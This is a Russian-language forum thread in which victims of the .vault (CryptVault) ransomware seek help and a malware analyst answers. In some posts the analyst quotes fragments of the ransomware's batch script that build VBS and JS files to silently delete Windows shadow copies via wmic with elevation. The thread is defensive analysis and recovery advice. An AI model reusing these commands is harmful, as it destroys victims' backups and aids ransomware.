файлы зашифрованы с расширением .vault , bat encoder /CryptVault

RSS

Сообщений: 11

Баллов: 5

Регистрация: 19.02.2015

Размещено 19.02.2015 20:27:57

Зашифровались файлы с расшрирением doc. и так далее. Cтали с расширением, например doc.vault. При загрузке компа выскакивает окно с ссылкой на сайт злоумышленников. Плз. помогите.

Прикрепленные файлы

DMITRY-MSI_2015-02-19_20-15-14.TXT

Ответы

Пред. 1 ... 41 42 43 44 45 ... 49 След.

Сообщений: 257

Баллов: 205

Регистрация: 17.05.2014

Размещено 15.05.2015 13:37:47

santy,
еще вопрос. Давно ли .VAULT зачищает теневые копии?
+
еще один командный сценарий на руках имеется - не сможете Его прокомментировать? На всяк случай запоролил, хотя это было излишним: infected

Прикрепленные файлы

Sec2.vir.zip (7.97 КБ)

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 15.05.2015 13:49:42

достаточно давно (месяца два не меньше, если не больше). файл сейчас гляну
а что именно по этому файлу прокомментировать? отключение теневых копий? надо сравнить со старыми вариантами бат-энкодера.
немного позже.

Изменено: santy - 04.06.2016 18:04:48

[ Как создать образ автозапуска? ]

Сообщений: 257

Баллов: 205

Регистрация: 17.05.2014

Размещено 15.05.2015 13:59:02

santy,
ну не знаю. может, какой "новый"/другой подход, хотя... фиг с Ним

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 15.05.2015 14:11:39

вот скажем в начале апреля был вариант.

Цитата
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\win.vbs" echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\win.vbs" echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\win.vbs" echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\win.vbs" echo var cdp="%%TEMP%%\\shdw.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\shdw.js"

Цитата

echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\win.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\win.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\win.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\win.vbs"
echo var cdp="%%TEMP%%\\shdw.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\shdw.js"

а это на конец марта

Цитата
echo Set objShell = CreateObject^("Shell.Application"^) > "%TEMP%\win.vbs" echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%TEMP%\win.vbs" echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%TEMP%\win.vbs" echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%TEMP%\win.vbs"

[ Как создать образ автозапуска? ]

Сообщений: 257

Баллов: 205

Регистрация: 17.05.2014

Размещено 16.05.2015 10:57:16

Цитата
NickM написал: Давно ли .VAULT зачищает теневые копии?

Цитата
santy написал: достаточно давно (месяца два не меньше, если не больше).

Комп сейчас не под рукой чтобы наверняка проверить, а сам еще этим вопросом не задавался... а что, для выполнения <"objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0"> не требуется прав администратора и/или повышение привелегий от UAC?

Изменено: NickM - 04.06.2016 18:04:48

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 16.05.2015 12:45:40

NickM, тестирую в основном на XP, не наблюдал как этот фрагмент отрабатывает на Win7,8

[ Как создать образ автозапуска? ]

Сообщений: 1

Регистрация: 19.05.2015

Размещено 19.05.2015 10:29:47

Доброго времени суток.
Тоже прошелся vault по машине - зашифровал данные...
Остались следующие файлы
vault.txt
vault.key
confirmation.key
в папке gnupg\
pubring.gpg
random_seed.
trustdb.gpg
еще остался батник который все это натворил Se5e.bat (в нем присутствует строка на на создание SECRING.QPQ с последующим переименованием в secring.gpg - самого файла нет).
Есть ли надежда на дешифровку?
Отправляю архив (пароль - infected )

Прикрепленные файлы

VAULT.rar (11.32 МБ)

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 19.05.2015 12:57:24

МАксим,
без secring.gpg расшифровка документов на нашей стороне невозможна.
ВАУЛТ. что делать?
http://chklst.ru/forum/discussion/1481/vault-chto-delat
когда произошло шифрование?

так же
проверьте наличие теневых копий,
возможно шифратору не удалось отключить теневые копии

Изменено: santy - 04.06.2016 18:05:31

[ Как создать образ автозапуска? ]

Сообщений: 1

Регистрация: 19.05.2015

Размещено 19.05.2015 13:07:13

Здравствуйте. Позвольте присоединиться к пострадавшим от шифровальщика.
secring.gpg нулевого размера.
Есть pubring.gpg и trustdb.gpg ненулевого размера.
В %temp% лежат файлы 7fbf4b71_VAULT.KEY, CONFIRMATION.KEY, VAULT.KEY
Образ автозапуска тут

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 19.05.2015 13:22:53

Денис,

Цитата
без secring.gpg расшифровка документов на нашей стороне невозможна. ВАУЛТ. что делать? http://chklst.ru/forum/discussion/1481/vault-chto-delat когда произошло шифрование? так же проверьте наличие теневых копий, возможно шифратору не удалось отключить теневые копии

Цитата

без secring.gpg расшифровка документов на нашей стороне невозможна.
ВАУЛТ. что делать?
http://chklst.ru/forum/discussion/1481/vault-chto-delat
когда произошло шифрование?

так же
проверьте наличие теневых копий,
возможно шифратору не удалось отключить теневые копии

+
проверьте, чтобы в автозапуске системы не было запчастей от ВАУЛТ, в частности js
который может запустить повторное шифрование.

[ Как создать образ автозапуска? ]

Пред. 1 ... 41 42 43 44 45 ... 49 След.